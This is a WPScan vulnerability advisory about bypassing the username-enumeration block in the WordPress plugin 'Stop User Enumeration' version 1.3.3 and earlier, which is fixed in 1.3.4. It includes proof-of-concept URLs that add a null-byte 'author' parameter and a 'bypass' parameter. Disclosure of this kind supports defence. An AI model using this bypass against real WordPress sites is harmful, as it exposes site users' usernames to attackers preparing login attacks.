Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass



Description
Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames.
Proof of Concept
Blocked: http://www.example.com/?author%00=%001
Passed: http://www.example.com/?bypass=1&author%00=1

Affects Plugin

fixed in version 1.3.4

References

URL https://wordpress.org/plugins/stop-user-enumeration/changelog/
URL https://plugins.trac.wordpress.org/changeset/1390935/stop-user-enumeration

Classification

Type BYPASS

Miscellaneous

Submitter Carlos Montiers Aguilera
Views 4414
Verified No
WPVDB ID 8436

Timeline

Publicly Published 2016-04-01 (over 3 years ago)
Added 2016-04-11 (over 3 years ago)
Last Updated 2019-10-31 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin